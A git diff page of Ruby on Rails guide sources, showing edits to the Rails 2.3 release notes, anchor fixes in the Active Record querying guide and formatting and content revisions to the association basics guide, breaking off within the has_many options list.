diff options
Diffstat (limited to 'railties/guides/source')
-rw-r--r-- | railties/guides/source/2_3_release_notes.textile | 27 | ||||
-rw-r--r-- | railties/guides/source/active_record_querying.textile | 4 | ||||
-rw-r--r-- | railties/guides/source/association_basics.textile | 381 | ||||
-rw-r--r-- | railties/guides/source/caching_with_rails.textile | 17 | ||||
-rw-r--r-- | railties/guides/source/index.erb.textile | 8 | ||||
-rw-r--r-- | railties/guides/source/layouts_and_rendering.textile | 8 | ||||
-rw-r--r-- | railties/guides/source/security.textile | 150 |
7 files changed, 310 insertions, 285 deletions
diff --git a/railties/guides/source/2_3_release_notes.textile b/railties/guides/source/2_3_release_notes.textile index 4734e32606..c58cbc0b81 100644 --- a/railties/guides/source/2_3_release_notes.textile +++ b/railties/guides/source/2_3_release_notes.textile @@ -1,5 +1,7 @@ h2. Ruby on Rails 2.3 Release Notes +NOTE: These release notes refer to RC2 of Rails 2.3. This is a release candidate, and not the final version of Rails 2.3. It's intended to be a stable testing release, and we urge you to test your own applications and report any issues to the "Rails Lighthouse":http://rails.lighthouseapp.com/projects/8994-ruby-on-rails/overview. + Rails 2.3 delivers a variety of new and improved features, including pervasive Rack integration, refreshed support for Rails Engines, nested transactions for Active Record, dynamic and default scopes, unified rendering, more efficient routing, application templates, and quiet backtraces. This list covers the major upgrades, but doesn't include every little bug fix and change. If you want to see everything, check out the "list of commits":http://github.com/rails/rails/commits/master in the main Rails repository on GitHub or review the +CHANGELOG+ files for the individual Rails components. endprologue. @@ -136,7 +138,7 @@ Customer.find_in_batches(:conditions => {:active => true}) do |customer_group| end </ruby> -You can pass most of the +find+ options into +find_in_batches+. However, you cannot specify the order that records will be returned in (they will always be returned in ascending order of primary key, which must be an integer), or use the +:limit+ option. Instead, use the +:batch_size: option, which defaults to 1000, to set the number of records that will be returned in each batch. +You can pass most of the +find+ options into +find_in_batches+. However, you cannot specify the order that records will be returned in (they will always be returned in ascending order of primary key, which must be an integer), or use the +:limit+ option. Instead, use the +:batch_size+ option, which defaults to 1000, to set the number of records that will be returned in each batch. The new +each+ method provides a wrapper around +find_in_batches+ that returns individual records, with the find itself being done in batches (of 1000 by default): @@ -146,7 +148,11 @@ Customer.each do |customer| end </ruby> -Note that you should only use this record for batch processing: for small numbers of records (less than 1000), you should just use the regular find methods with your own loop. +Note that you should only use this method for batch processing: for small numbers of records (less than 1000), you should just use the regular find methods with your own loop. + +* More Information: + - "Rails 2.3: Batch Finding":http://afreshcup.com/2009/02/23/rails-23-batch-finding/ + - "What's New in Edge Rails: Batched Find":http://ryandaigle.com/articles/2009/2/23/what-s-new-in-edge-rails-batched-find h4. Multiple Conditions for Callbacks @@ -313,6 +319,8 @@ h4. Other Action Controller Changes * Cookie sessions now have persistent session identifiers, with API compatibility with the server-side stores. * You can now use symbols for the +:type+ option of +send_file+ and +send_data+, like this: +send_file("fabulous.png", :type => :png)+. * The +:only+ and +:except+ options for +map.resources+ are no longer inherited by nested resources. +* The bundled memcached client has been updated to version 1.6.4.99. +* The +expires_in+, +stale?+, and +fresh_when+ methods now accept a +:public+ option to make them work well with proxy caching. h3. Action View @@ -431,6 +439,18 @@ returns </optgroup> </ruby> +h4. A Note About Template Loading + +Rails 2.3 includes the ability to enable or disable cached templates for any particular environment. Cached templates give you a speed boost because they don't check for a new template file when they're rendered - but they also mean that you can't replace a template "on the fly" without restarting the server. + +In most cases, you'll want template caching to be turned on in production, which you can do by making a setting in your +production.rb+ file: + +<ruby> +config.action_view.cache_template_loading = true +</ruby> + +This line will be generated for you by default in a new Rails 2.3 application. If you've upgraded from an older version of Rails, Rails will default to caching templates in production and test but not in development. + h4. Other Action View Changes * Token generation for CSRF protection has been simplified; now Rails uses a simple random string generated by +ActiveSupport::SecureRandom+ rather than mucking around with session IDs. @@ -481,7 +501,7 @@ In addition to the Rack changes covered above, Railties (the core code of Rails h4. Rails Metal -Rails Metal is a new mechanism that provides superfast endpoints inside of your Rails applications. Metal classes bypass routing and Action Controller to give you raw speed (at the cost of all the things in Action Controller, of course). This builds on all of the recent foundation work to make Rails a Rack application with an exposed middleware stack. +Rails Metal is a new mechanism that provides superfast endpoints inside of your Rails applications. Metal classes bypass routing and Action Controller to give you raw speed (at the cost of all the things in Action Controller, of course). This builds on all of the recent foundation work to make Rails a Rack application with an exposed middleware stack. Metal endpoints can be loaded from your application or from plugins. * More Information: ** "Introducing Rails Metal":http://weblog.rubyonrails.org/2008/12/17/introducing-rails-metal @@ -538,6 +558,7 @@ A few pieces of older code are deprecated in this release: * +formatted_polymorphic_url+ is deprecated. Use +polymorphic_url+ with +:format+ instead. * The +:http_only+ option in +ActionController::Response#set_cookie+ has been renamed to +:httponly+. * The +:connector+ and +:skip_last_comma+ options of +to_sentence+ have been replaced by +:words_connnector+, +:two_words_connector+, and +:last_word_connector+ options. +* Posting a multipart form with an empty +file_field+ control used to submit an empty string to the controller. Now it submits a nil, due to differences between Rack's multipart parser and the old Rails one. h3. Credits diff --git a/railties/guides/source/active_record_querying.textile b/railties/guides/source/active_record_querying.textile index 5da15bbb5c..03e1b264b2 100644 --- a/railties/guides/source/active_record_querying.textile +++ b/railties/guides/source/active_record_querying.textile @@ -314,7 +314,7 @@ This will find all clients created yesterday by using a +BETWEEN+ SQL statement: SELECT * FROM clients WHERE (clients.created_at BETWEEN '2008-12-21 00:00:00' AND '2008-12-22 00:00:00') </sql> -This demonstrates a shorter syntax for the examples in "Array Conditions":#array-conditions +This demonstrates a shorter syntax for the examples in "Array Conditions":#arrayconditions h5. Subset conditions @@ -376,7 +376,7 @@ By default, <tt>Model.find</tt> selects all the fields from the result set using To select only a subset of fields from the result set, you can specify the subset via +:select+ option on the +find+. -NOTE: If the +:select+ option is used, all the returning objects will be "read only":#read-only objects. +NOTE: If the +:select+ option is used, all the returning objects will be "read only":#readonlyobjects. <br /> diff --git a/railties/guides/source/association_basics.textile b/railties/guides/source/association_basics.textile index e82f32d35e..3c03c825cd 100644 --- a/railties/guides/source/association_basics.textile +++ b/railties/guides/source/association_basics.textile @@ -37,7 +37,7 @@ end @customer.destroy </ruby> -With Active Record associations, we can streamline these - and other - operations by declaratively telling Rails that there is a connection between the two models. Here's the revised code for setting up customers and orders: +With Active Record associations, we can streamline these -- and other -- operations by declaratively telling Rails that there is a connection between the two models. Here's the revised code for setting up customers and orders: <ruby> class Customer < ActiveRecord::Base @@ -61,7 +61,7 @@ Deleting a customer and all of its orders is _much_ easier: @customer.destroy </ruby> -To learn more about the different types of associations, read the next section of this Guide. That's followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails. +To learn more about the different types of associations, read the next section of this guide. That's followed by some tips and tricks for working with associations, and then by a complete reference to the methods and options for associations in Rails. h3. The Types of Associations @@ -76,7 +76,7 @@ In Rails, an _association_ is a connection between two Active Record models. Ass In the remainder of this guide, you'll learn how to declare and use the various forms of associations. But first, a quick introduction to the situations where each association type is appropriate. -h4. The belongs_to Association +h4. The +belongs_to+ association A +belongs_to+ association sets up a one-to-one connection with another model, such that each instance of the declaring model "belongs to" one instance of the other model. For example, if your application includes customers and orders, and each order can be assigned to exactly one customer, you'd declare the order model this way: @@ -88,7 +88,7 @@ end !images/belongs_to.png(belongs_to Association Diagram)! -h4. The has_one Association +h4. The +has_one+ association A +has_one+ association also sets up a one-to-one connection with another model, but with somewhat different semantics (and consequences). This association indicates that each instance of a model contains or possesses one instance of another model. For example, if each supplier in your application has only one account, you'd declare the supplier model like this: @@ -100,7 +100,7 @@ end !images/has_one.png(has_one Association Diagram)! -h4. The has_many Association +h4. The +has_many+ association A +has_many+ association indicates a one-to-many connection with another model. You'll often find this association on the "other side" of a +belongs_to+ association. This association indicates that each instance of the model has zero or more instances of another model. For example, in an application containing customers and orders, the customer model could be declared like this: @@ -114,7 +114,7 @@ NOTE: The name of the other model is pluralized when declaring a +has_many+ asso !images/has_many.png(has_many Association Diagram)! -h4. The has_many :through Association +h4. The +has_many :through+ association A +has_many :through+ association is often used to set up a many-to-many connection with another model. This association indicates that the declaring model can be matched with zero or more instances of another model by proceeding _through_ a third model. For example, consider a medical practice where patients make appointments to see physicians. The relevant association declarations could look like this: @@ -155,7 +155,7 @@ class Paragraph < ActiveRecord::Base end </ruby> -h4. The has_one :through Association +h4. The +has_one :through+ association A +has_one :through+ association sets up a one-to-one connection with another model. This association indicates that the declaring model can be matched with one instance of another model by proceeding _through_ a third model. For example, if each supplier has one account, and each account is associated with one account history, then the customer model could look like this: @@ -177,7 +177,7 @@ end !images/has_one_through.png(has_one :through Association Diagram)! -h4. The has_and_belongs_to_many Association +h4. The +has_and_belongs_to_many+ association A +has_and_belongs_to_many+ association creates a direct many-to-many connection with another model, with no intervening model. For example, if your application includes assemblies and parts, with each assembly having many parts and each part appearing in many assemblies, you could declare the models this way: @@ -193,7 +193,7 @@ end !images/habtm.png(has_and_belongs_to_many Association Diagram)! -h4. Choosing Between belongs_to and has_one +h4. Choosing between +belongs_to+ and +has_one+ If you want to set up a 1–1 relationship between two models, you'll need to add +belongs_to+ to one, and +has_one+ to the other. How do you know which is which? @@ -235,7 +235,7 @@ end NOTE: Using +t.integer :supplier_id+ makes the foreign key naming obvious and explicit. In current versions of Rails, you can abstract away this implementation detail by using +t.references :supplier+ instead. -h4. Choosing Between has_many :through and has_and_belongs_to_many +h4. Choosing between +has_many :through+ and +has_and_belongs_to_many+ Rails offers two different ways to declare a many-to-many relationship between models. The simpler way is to use +has_and_belongs_to_many+, which allows you to make the association directly: @@ -272,7 +272,7 @@ The simplest rule of thumb is that you should set up a +has_many :through+ relat You should use +has_many :through+ if you need validations, callbacks, or extra attributes on the join model. -h4. Polymorphic Associations +h4. Polymorphic associations A slightly more advanced twist on associations is the _polymorphic association_. With polymorphic associations, a model can belong to more than one other model, on a single association. For example, you might have a picture model that belongs to either an employee model or a product model. Here's how this could be declared: @@ -319,7 +319,7 @@ This migration can be simplified by using the +t.references+ form: class CreatePictures < ActiveRecord::Migration def self.up create_table :pictures do |t| - t.string :name + t.string :name t.references :imageable, :polymorphic => true t.timestamps end @@ -333,7 +333,7 @@ end !images/polymorphic.png(Polymorphic Association Diagram)! -h4. Self Joins +h4. Self joins In designing a data model, you will sometimes find a model that should have a relation to itself. For example, you may want to store all employees in a single database model, but be able to trace relationships such as between manager and subordinates. This situation can be modeled with self-joining associations: @@ -356,7 +356,7 @@ Here are a few things you should know to make efficient use of Active Record ass * Updating the schema * Controlling association scope -h4. Controlling Caching +h4. Controlling caching All of the association methods are built around caching, which keeps the result of the most recent query available for further operations. The cache is even shared across methods. For example: @@ -375,15 +375,15 @@ customer.orders(true).empty? # discards the cached copy of orders # and goes back to the database </ruby> -h4. Avoiding Name Collisions +h4. Avoiding name collisions You are not free to use just any name for your associations. Because creating an association adds a method with that name to the model, it is a bad idea to give an association a name that is already used for an instance method of +ActiveRecord::Base+. The association method would override the base method and break things. For instance, +attributes+ or +connection+ are bad names for associations. -h4. Updating the Schema +h4. Updating the schema Associations are extremely useful, but they are not magic. You are responsible for maintaining your database schema to match your associations. In practice, this means two things, depending on what sort of associations you are creating. For +belongs_to+ associations you need to create foreign keys, and for +has_and_belongs_to_many+ associations you need to create the appropriate join table. -h5. Creating Foreign Keys for belongs_to Associations +h5. Creating foreign Keys for +belongs_to+ associations When you declare a +belongs_to+ association, you need to create foreign keys as appropriate. For example, consider this model: @@ -399,9 +399,9 @@ This declaration needs to be backed up by the proper foreign key declaration on class CreateOrders < ActiveRecord::Migration def self.up create_table :orders do |t| - t.datetime :order_date - t.string :order_number - t.integer :customer_id + t.datetime :order_date + t.string :order_number + t.integer :customer_id end end @@ -413,7 +413,7 @@ end If you create an association some time after you build the underlying model, you need to remember to create an +add_column+ migration to provide the necessary foreign key. -h5. Creating Join Tables for has_and_belongs_to_many Associations +h5. Creating join tables for +has_and_belongs_to_many+ associations If you create a +has_and_belongs_to_many+ association, you need to explicitly create the joining table. Unless the name of the join table is explicitly specified by using the +:join_table+ option, Active Record creates the name by using the lexical order of the class names. So a join between customer and order models will give the default join table name of "customers_orders" because "c" outranks "o" in lexical ordering. @@ -448,7 +448,9 @@ class CreateAssemblyPartJoinTable < ActiveRecord::Migration end </ruby> -h4. Controlling Association Scope +We pass +:id => false+ to +create_table+ because that table does not represent a model. That's required for the association to work properly. If you observe any strange behaviour in a +has_and_belongs_to_many+ association like mangled models IDs, or exceptions about conflicting IDs chances are you forgot that bit. + +h4. Controlling association scope By default, associations look for objects only within the current module's scope. This can be important when you declare Active Record models within a module. For example: @@ -484,7 +486,7 @@ module MyApplication end </ruby> -To associate a model with a model in a different scope, you must specify the complete class name in your association declaration: +To associate a model with a model in a different namespace, you must specify the complete class name in your association declaration: <ruby> module MyApplication @@ -508,17 +510,16 @@ h3. Detailed Association Reference The following sections give the details of each type of association, including the methods that they add and the options that you can use when declaring an association. -h4. belongs_to Association Reference +h4. +belongs_to+ association reference The +belongs_to+ association creates a one-to-one match with another model. In database terms, this association says that this class contains the foreign key. If the other class contains the foreign key, then you should use +has_one+ instead. -h5. Methods Added by belongs_to +h5. Methods added by +belongs_to+ -When you declare a +belongs_to+ association, the declaring class automatically gains five methods related to the association: +When you declare a +belongs_to+ association, the declaring class automatically gains four methods related to the association: * <tt><em>association</em>(force_reload = false)</tt> * <tt><em>association</em>=(associate)</tt> -* <tt><em>association</em>.nil?</tt> * <tt>build_<em>association</em>(attributes = {})</tt> * <tt>create_<em>association</em>(attributes = {})</tt> @@ -535,7 +536,6 @@ Each instance of the order model will have these methods: <ruby> customer customer= -customer.nil? build_customer create_customer </ruby> @@ -558,23 +558,13 @@ The <tt><em>association</em>=</tt> method assigns an associated object to this o @order.customer = @customer </ruby> -h6. _association_.nil? - -The <tt><em>association</em>.nil?</tt> method returns +true+ if there is no associated object. - -<ruby> -if @order.customer.nil? - @msg = "No customer found for this order" -end -</ruby> - h6. build_<em>association</em>(attributes = {}) The <tt>build_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set, but the associated object will _not_ yet be saved. <ruby> -@customer = @order.build_customer({:customer_number => 123, - :customer_name => "John Doe"}) +@customer = @order.build_customer(:customer_number => 123, + :customer_name => "John Doe") </ruby> h6. create_<em>association</em>(attributes = {}) @@ -582,11 +572,12 @@ h6. create_<em>association</em>(attributes = {}) The <tt>create_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through this object's foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@customer = @order.create_customer({:customer_number => 123, - :customer_name => "John Doe"}) +@customer = @order.create_customer(:customer_number => 123, + :customer_name => "John Doe") </ruby> -h5. Options for belongs_to + +h5. Options for +belongs_to+ In many situations, you can use the default behavior of +belongs_to+ without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +belongs_to+ association. For example, an association with several options might look like this: @@ -611,11 +602,11 @@ The +belongs_to+ association supports these options: * +:select+ * +:validate+ -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if an order belongs to a customer, but the actual name of the model containing customers is +Patron+, you'd set things up this way: @@ -625,7 +616,7 @@ class Order < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). @@ -635,7 +626,7 @@ class Order < ActiveRecord::Base end </ruby> -h6. :counter_cache +h6. +:counter_cache+ The +:counter_cache+ option can be used to make finding the number of belonging objects more efficient. Consider these models: @@ -659,7 +650,7 @@ class Customer < ActiveRecord::Base end </ruby> -With this declaration, Rails will keep the cache value up to date, and then return that value in response to the +.size+ method. +With this declaration, Rails will keep the cache value up to date, and then return that value in response to the +size+ method. Although the +:counter_cache+ option is specified on the model that includes the +belongs_to+ declaration, the actual column must be added to the _associated_ model. In the case above, you would need to add a column named +orders_count+ to the +Customer+ model. You can override the default column name if you need to: @@ -674,13 +665,13 @@ end Counter cache columns are added to the containing model's list of read-only attributes through +attr_readonly+. -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. WARNING: You should not specify this option on a +belongs_to+ association that is connected with a +has_many+ association on the other class. Doing so can lead to orphaned records in your database. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on this model is the name of the association with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -693,7 +684,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: @@ -731,39 +722,48 @@ end NOTE: There's no need to use +:include+ for immediate associations - that is, if you have +Order belongs_to :customer+, then the customer is eager-loaded automatically when it's needed. -h6. :polymorphic +h6. +:polymorphic+ -Passing +true+ to the +:polymorphic+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphic-associations">earlier in this guide</a>. +Passing +true+ to the +:polymorphic+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated object will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns. TIP: If you set the +:select+ option on a +belongs_to+ association, you should also set the +foreign_key+ option to guarantee the correct results. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +true+, then associated objects will be validated whenever you save this object. By default, this is +false+: associated objects will not be validated when this object is saved. -h5. When are Objects Saved? +h5. How to know whether there's an associated object? + +To know whether there's and associated object just check <tt><em>association</em>.nil?</tt>: + +<ruby> +if @order.customer.nil? + @msg = "No customer found for this order" +end +</ruby> + +h5. When are objects saved? Assigning an object to a +belongs_to+ association does _not_ automatically save the object. It does not save the associated object either. -h4. has_one Association Reference +h4. +has_one+ association reference The +has_one+ association creates a one-to-one match with another model. In database terms, this association says that the other class contains the foreign key. If this class contains the foreign key, then you should use +belongs_to+ instead. -h5. Methods Added by has_one +h5. Methods added by +has_one+ -When you declare a +has_one+ association, the declaring class automatically gains five methods related to the association: +When you declare a +has_one+ association, the declaring class automatically gains four methods related to the association: * <tt><em>association</em>(force_reload = false)</tt> * <tt><em>association</em>=(associate)</tt> -* <tt><em>association</em>.nil?</tt> * <tt>build_<em>association</em>(attributes = {})</tt> * <tt>create_<em>association</em>(attributes = {})</tt> @@ -780,12 +780,11 @@ Each instance of the +Supplier+ model will have these methods: <ruby> account account= -account.nil? build_account create_account </ruby> -h6. <em>association</em>(force_reload = false) +h6. <tt><em>association</em>(force_reload = false)</tt> The <tt><em>association</em></tt> method returns the associated object, if any. If no associated object is found, it returns +nil+. @@ -795,7 +794,7 @@ The <tt><em>association</em></tt> method returns the associated object, if any. If the associated object has already been retrieved from the database for this object, the cached version will be returned. To override this behavior (and force a database read), pass +true+ as the +force_reload+ argument. -h6. <em>association</em>=(associate) +h6. <tt><em>association</em>=(associate)</tt> The <tt><em>association</em>=</tt> method assigns an associated object to this object. Behind the scenes, this means extracting the primary key from this object and setting the associate object's foreign key to the same value. @@ -803,33 +802,23 @@ The <tt><em>association</em>=</tt> method assigns an associated object to this o @supplier.account = @account </ruby> -h6. <em>association</em>.nil? - -The <tt><em>association</em>.nil?</tt> method returns +true+ if there is no associated object. - -<ruby> -if @supplier.account.nil? - @msg = "No account found for this supplier" -end -</ruby> - -h6. build_<em>association</em>(attributes = {}) +h6. <tt>build_<em>association</em>(attributes = {})</tt> The <tt>build_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set, but the associated object will _not_ yet be saved. <ruby> -@account = @supplier.build_account({:terms => "Net 30"}) +@account = @supplier.build_account(:terms => "Net 30") </ruby> -h6. create_<em>association</em>(attributes = {}) +h6. <tt>create_<em>association</em>(attributes = {})</tt> The <tt>create_<em>association</em></tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through its foreign key will be set. In addition, the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@account = @supplier.create_account({:terms => "Net 30"}) +@account = @supplier.create_account(:terms => "Net 30") </ruby> -h5. Options for has_one +h5. Options for +has_one+ In many situations, you can use the default behavior of +has_one+ without any customization. But despite Rails' emphasis of convention over customization, you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_one+ association. For example, an association with several options might look like this: @@ -857,17 +846,17 @@ The +has_one+ association supports these options: * +:through+ * +:validate+ -h6. :as +h6. +:as+ -Setting the +:as+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphic-associations">earlier in this guide</a>. +Setting the +:as+ option indicates that this is a polymorphic association. Polymorphic associations were discussed in detail <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ -If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is Billing, you'd set things up this way: +If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a supplier has an account, but the actual name of the model containing accounts is +Billing+, you'd set things up this way: <ruby> class Supplier < ActiveRecord::Base @@ -875,7 +864,7 @@ class Supplier < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). @@ -885,11 +874,11 @@ class Supplier < ActiveRecord::Base end </ruby> -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the association object to +NULL+. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated object to delete that object. If you set the +:dependent+ option to +:delete+, then deleting this object will delete the associated object _without_ calling its +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the association object to +NULL+. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -901,7 +890,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: @@ -937,53 +926,63 @@ class Representative < ActiveRecord::Base end </ruby> -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). Because a +has_one+ association will only retrieve a single associated object, this option should not be needed. -h6. :primary_key +h6. +:primary_key+ By convention, Rails guesses that the column used to hold the primary key of this model is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated object will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated object. By default, Rails retrieves all columns. -h6. :source +h6. +:source+ The +:source+ option specifies the source association name for a +has_one :through+ association. -h6. :source_type +h6. +:source_type+ The +:source_type+ option specifies the source association type for a +has_one :through+ association that proceeds through a polymorphic association. h6. :through -The +:through+ option specifies a join model through which to perform the query. +has_one :through+ associations were discussed in detail <a href="#thehas-onethrough-association">earlier in this guide</a>. +The +:through+ option specifies a join model through which to perform the query. +has_one :through+ associations were discussed in detail <a href="#thehas-onethroughassociation">earlier in this guide</a>. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +true+, then associated objects will be validated whenever you save this object. By default, this is +false+: associated objects will not be validated when this object is saved. -h5. When are Objects Saved? +h5. How to know whether there's an associated object? + +To know whether there's and associated object just check <tt><em>association</em>.nil?</tt>: + +<ruby> +if @supplier.account.nil? + @msg = "No account found for this supplier" +end +</ruby> + +h5. When are objects saved? When you assign an object to a +has_one+ association, that object is automatically saved (in order to update its foreign key). In addition, any object being replaced is also automatically saved, because its foreign key will change too. If either of these saves fails due to validation errors, then the assignment statement returns +false+ and the assignment itself is cancelled. -If the parent object (the one declaring the +has_one+ association) is unsaved (that is, +new_record?+ returns +true+) then the child objects are not saved. +If the parent object (the one declaring the +has_one+ association) is unsaved (that is, +new_record?+ returns +true+) then the child objects are not saved. They will automatically when the parent object is saved. If you want to assign an object to a +has_one+ association without saving the object, use the <tt><em>association</em>.build</tt> method. -h4. has_many Association Reference +h4. +has_many+ association reference The +has_many+ association creates a one-to-many relationship with another model. In database terms, this association says that the other class will have a foreign key that refers to instances of this class. -h5. Methods Added +h5. Methods added When you declare a +has_many+ association, the declaring class automatically gains 13 methods related to the association: @@ -1027,7 +1026,7 @@ orders.build(attributes = {}, ...) orders.create(attributes = {}) </ruby> -h6. <em>collection</em>(force_reload = false) +h6. <tt><em>collection</em>(force_reload = false)</tt> The <tt><em>collection</em></tt> method returns an array of all of the associated objects. If there are no associated objects, it returns an empty array. @@ -1035,7 +1034,7 @@ The <tt><em>collection</em></tt> method returns an array of all of the associate @orders = @customer.orders </ruby> -h6. <em>collection</em><<(object, ...) +h6. <tt><em>collection</em><<(object, ...)</tt> The <tt><em>collection</em><<</tt> method adds one or more objects to the collection by setting their foreign keys to the primary key of the calling model. @@ -1043,7 +1042,7 @@ The <tt><em>collection</em><<</tt> method adds one or more objects to the collec @customer.orders << @order1 </ruby> -h6. <em>collection</em>.delete(object, ...) +h6. <tt><em>collection</em>.delete(object, ...)</tt> The <tt><em>collection</em>.delete</tt> method removes one or more objects from the collection by setting their foreign keys to +NULL+. @@ -1054,11 +1053,11 @@ The <tt><em>collection</em>.delete</tt> method removes one or more objects from WARNING: Objects will be in addition destroyed if they're associated with +:dependent => :destroy+, and deleted if they're associated with +:dependent => :delete_all+. -h6. <em>collection</em>=objects +h6. <tt><em>collection</em>=objects</tt> The <tt><em>collection</em>=</tt> method makes the collection contain only the supplied objects, by adding and deleting as appropriate. -h6. <em>collection_singular</em>_ids +h6. <tt><em>collection_singular</em>_ids</tt> The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids of the objects in the collection. @@ -1066,15 +1065,15 @@ The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids @order_ids = @customer.order_ids </ruby> -h6. <em>collection_singular</em>_ids=ids +h6. <tt><em>collection_singular</em>_ids=ids</tt> The <tt><em>collection_singular</em>_ids=</tt> method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate. -h6. <em>collection</em>.clear +h6. <tt><em>collection</em>.clear</tt> The <tt><em>collection</em>.clear</tt> method removes every object from the collection. This destroys the associated objects if they are associated with +:dependent => :destroy+, deletes them directly from the database if +:dependent => :delete_all+, and otherwise sets their foreign keys to +NULL+. -h6. <em>collection</em>.empty? +h6. <tt><em>collection</em>.empty?</tt> The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection does not contain any associated objects. @@ -1084,7 +1083,7 @@ The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection <% end %> </ruby> -h6. <em>collection</em>.size +h6. <tt><em>collection</em>.size</tt> The <tt><em>collection</em>.size</tt> method returns the number of objects in the collection. @@ -1092,7 +1091,7 @@ The <tt><em>collection</em>.size</tt> method returns the number of objects in th @order_count = @customer.orders.size </ruby> -h6. <em>collection</em>.find(...) +h6. <tt><em>collection</em>.find(...)</tt> The <tt><em>collection</em>.find</tt> method finds objects within the collection. It uses the same syntax and options as +ActiveRecord::Base.find+. @@ -1100,29 +1099,29 @@ The <tt><em>collection</em>.find</tt> method finds objects within the collection @open_orders = @customer.orders.find(:all, :conditions => "open = 1") </ruby> -h6. <em>collection</em>.exist?(...) +h6. <tt><em>collection</em>.exist?(...)</tt> The <tt><em>collection</em>.exist?</tt> method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as +ActiveRecord::Base.exists?+. -h6. <em>collection</em>.build(attributes = {}, ...) +h6. <tt><em>collection</em>.build(attributes = {}, ...)</tt> The <tt><em>collection</em>.build</tt> method returns one or more new objects of the associated type. These objects will be instantiated from the passed attributes, and the link through their foreign key will be created, but the associated objects will _not_ yet be saved. <ruby> -@order = @customer.orders.build({:order_date => Time.now, - :order_number => "A12345"}) +@order = @customer.orders.build(:order_date => Time.now, + :order_number => "A12345") </ruby> -h6. <em>collection</em>.create(attributes = {}) +h6. <tt><em>collection</em>.create(attributes = {})</tt> The <tt><em>collection</em>.create</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through its foreign key will be created, and the associated object _will_ be saved (assuming that it passes any validations). <ruby> -@order = @customer.orders.create({:order_date => Time.now, - :order_number => "A12345"}) +@order = @customer.orders.create(:order_date => Time.now, + :order_number => "A12345") </ruby> -h5. Options for has_many +h5. Options for +has_many+ In many situations, you can use the default behavior for +has_many+ without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_many+ association. For example, an association with several options might look like this: @@ -1157,15 +1156,15 @@ The +has_many+ association supports these options: * +:uniq+ 